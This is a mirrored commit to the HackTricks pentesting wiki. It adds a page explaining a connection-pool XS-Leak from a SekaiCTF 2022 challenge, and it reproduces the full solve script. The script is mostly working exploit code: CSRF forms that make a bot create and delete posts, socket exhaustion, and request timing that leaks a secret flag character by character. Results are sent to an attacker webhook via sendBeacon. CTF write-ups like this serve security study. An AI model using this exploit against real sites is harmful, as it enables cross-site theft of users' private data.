mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3598] No subject
This commit is contained in:
parent
5e03f01afc
commit
a604b20124
3 changed files with 185 additions and 1 deletions
|
@ -561,6 +561,7 @@
|
|||
* [XSS in Markdown](pentesting-web/xss-cross-site-scripting/xss-in-markdown.md)
|
||||
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
|
||||
* [XS-Search/XS-Leaks](pentesting-web/xs-search.md)
|
||||
* [Connection Pool Example](pentesting-web/xs-search/connection-pool-example.md)
|
||||
* [CSS Injection](pentesting-web/xs-search/css-injection/README.md)
|
||||
* [CSS Injection Code](pentesting-web/xs-search/css-injection/css-injection-code.md)
|
||||
|
||||
|
|
|
@ -252,12 +252,16 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
|
|||
|
||||
### Connection Pool
|
||||
|
||||
* **Inclusion Methods**:
|
||||
* **Inclusion Methods**: JavaScript Requests
|
||||
* **Detectable Difference**: Timing (generally due to Page Content, Status Code)
|
||||
* **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
|
||||
* **Summary:** An attacker could lock all the sockets except 1, load the target web and at the same time load another page, the time until the last page is starting to load is the time the target page took to load.
|
||||
* **Code Example**:
|
||||
|
||||
{% content-ref url="xs-search/connection-pool-example.md" %}
|
||||
[connection-pool-example.md](xs-search/connection-pool-example.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Browsers use sockets to communicate with servers. As the operating system and the hardware it runs on have limited resources, **browsers have to impose a limit**. To exploit the existence of this limit, attackers can:
|
||||
|
||||
1. Check what the limit of the browser is, for example 256 global sockets.
|
||||
|
|
179
pentesting-web/xs-search/connection-pool-example.md
Normal file
179
pentesting-web/xs-search/connection-pool-example.md
Normal file
|
@ -0,0 +1,179 @@
|
|||
# Connection Pool Example
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
In the [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution) challenge, [**@Strellic\_**](https://twitter.com/Strellic\_) **** gives an example of how to use a **variation** of the **Connection Pool** technique to perform a **XS-Leak**.
|
||||
|
||||
In this challenge, the goal is to exfiltrate a flag that will appear in the bots web session inside a post. These are the assets the attacker has:
|
||||
|
||||
* The **bot** will **visit** a **URL** given by the attacker
|
||||
* The attacker can **inject HTML** in the page (but no JS, dompurify is used) abusing a **CSRF** making the **bot create a post** with that HTML.
|
||||
* The attacker can abuse a CSRF to make the **bot** **delete** the **first** **post** inside the web.
|
||||
* Because the **posts** are ordered **alphabetically**, when the **first post is deleted**, if the **HTML** content of the attacker is **loaded** means that it was **alphabetically before the flag**.
|
||||
|
||||
Therefore, to steal the flag, the solution proposed by @Strellyc\_ is to, **for each char to test** make the bot:
|
||||
|
||||
* Create a **new post** that **starts** with the known part of the **flag** and several **img** **loads**.
|
||||
* **Delete** the **post** in position **0**.
|
||||
* Block 255 sockets.
|
||||
* Load the page with the posts
|
||||
* Perform 5 random requests to a site (example.com in this case) and measure the time this takes.
|
||||
|
||||
{% hint style="warning" %}
|
||||
If the **deleted** post was the **flag**, this means that all the **images** **injected** in the HTML are going to be **fighting** with the **5 random requests** for that **unblocked** socket. Which means that the time measured is going to be bigger than the other scenario.
|
||||
|
||||
If the **deleted** post was the **HTML**, the **5 random requests** will be **faster** because they don't need to fight for that socket with the HTML injected.
|
||||
{% endhint %}
|
||||
|
||||
This is the exploit code, taken from [https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html](https://github.com/project-sekai-ctf/sekaictf-2022/blob/main/web/safelist/solution/solve.html):
|
||||
|
||||
```html
|
||||
<!-- Form to inject HTML code in the bots page -->
|
||||
<form method="POST" action="https://safelist.ctf.sekai.team/create" id="create" target="_blank">
|
||||
<input type="text" name="text" />
|
||||
<input type="submit" />
|
||||
</form>
|
||||
|
||||
<!-- Form to delete the first entry -->
|
||||
<form method="POST" action="https://safelist.ctf.sekai.team/remove" id="remove" target="_blank">
|
||||
<input type="text" name="index" value="0" />
|
||||
<input type="submit" />
|
||||
</form>
|
||||
|
||||
<script>
|
||||
// Attacker listening
|
||||
const WEBHOOK = "https://WEBHOOK.com/";
|
||||
// Send data to attacker
|
||||
const log = (id, data) => {
|
||||
let payload = JSON.stringify({ known, alphabet, data });
|
||||
console.log(id, payload);
|
||||
navigator.sendBeacon(WEBHOOK + "?" + id, payload);
|
||||
}
|
||||
|
||||
// Similar to JQuery
|
||||
const $ = document.querySelector.bind(document);
|
||||
|
||||
// Known part of the flag
|
||||
const known = "SEKAI{";
|
||||
let alphabet = "_abcdefghijklmnopqrstuvwxyz}";
|
||||
|
||||
// Reduce the alphabet using a hash (#) in the URL
|
||||
if (location.hash) {
|
||||
alphabet = alphabet.slice(alphabet.indexOf(location.hash.slice(1)));
|
||||
}
|
||||
|
||||
// Funtion to leak chars
|
||||
const leak = async (c) => {
|
||||
// Prepare post with known flag and the new char
|
||||
let payload = `${known + c}`;
|
||||
// Inject as many <img as possible
|
||||
// you need to respect the CSP and create URLs that are different
|
||||
for(let i = 0; payload.length < 2048; i++) {
|
||||
payload += `<img src=js/purify.js?${i.toString(36)}>`;
|
||||
}
|
||||
|
||||
// Inject HTML
|
||||
$("#create input[type=text]").value = payload;
|
||||
$("#create").submit();
|
||||
await new Promise(r => setTimeout(r, 1000));
|
||||
|
||||
// Remove post with index 0
|
||||
$("#remove").submit();
|
||||
await new Promise(r => setTimeout(r, 500));
|
||||
|
||||
let deltas = [];
|
||||
|
||||
// Try each char 3 times
|
||||
for (let i = 0; i < 3; i++) {
|
||||
const SOCKET_LIMIT = 255;
|
||||
// you will need a custom server that works like num.sleepserver.com/sleep/delay
|
||||
// needed to freeze the blocked sockets, and they have to all be on different origins
|
||||
// Check https://www.npmjs.com/package/sleep-server using subdomains DNS wildcard
|
||||
const SLEEP_SERVER = i => `http://${i}.sleepserver.com/sleep/60`;
|
||||
|
||||
const block = async (i, controller) => {
|
||||
try {
|
||||
return fetch(SLEEP_SERVER(i), { mode: "no-cors", signal: controller.signal });
|
||||
}
|
||||
catch(err) {}
|
||||
};
|
||||
|
||||
// block SOCKET_LIMIT sockets
|
||||
const controller = new AbortController();
|
||||
for (let i = 0; i < SOCKET_LIMIT; i++) {
|
||||
block(i, controller);
|
||||
}
|
||||
|
||||
// Make the bot access the page with the posts
|
||||
window.open("https://safelist.ctf.sekai.team/?" + Math.random().toString(36).slice(2), "pwn");
|
||||
await new Promise(r => setTimeout(r, 500));
|
||||
|
||||
// start meassuring time to perform 5 requests
|
||||
let start = performance.now();
|
||||
await Promise.all([
|
||||
fetch("https://example.com", { mode: "no-cors" }),
|
||||
fetch("https://example.com", { mode: "no-cors" }),
|
||||
fetch("https://example.com", { mode: "no-cors" }),
|
||||
fetch("https://example.com", { mode: "no-cors" }),
|
||||
fetch("https://example.com", { mode: "no-cors" })
|
||||
]);
|
||||
let delta = performance.now() - start;
|
||||
document.title = delta;
|
||||
controller.abort();
|
||||
|
||||
log("test_" + c + "_" + i, delta);
|
||||
|
||||
// Save time needed
|
||||
deltas.push(delta);
|
||||
}
|
||||
return deltas;
|
||||
};
|
||||
|
||||
// Check each char
|
||||
const pwn = async () => {
|
||||
// Try to leak each character
|
||||
for(let i = 0; i < alphabet.length; i++) {
|
||||
//Check the indicated char
|
||||
let deltas = await leak(alphabet[i]);
|
||||
|
||||
// Calculate mean time from requests to example.com
|
||||
let avg = deltas.reduce((a,v) => a+v, 0) / deltas.length;
|
||||
|
||||
// If greater than 250, the HTML code was injected (flag in index 0)
|
||||
if (avg > 250) {
|
||||
log("tests_pos_" + alphabet[i], deltas)
|
||||
}
|
||||
// Flag in the page
|
||||
else {
|
||||
log("tests_neg_" + alphabet[i], deltas)
|
||||
}
|
||||
}
|
||||
};
|
||||
|
||||
window.onload = async () => {
|
||||
pwn();
|
||||
};
|
||||
</script>
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
Loading…
Reference in a new issue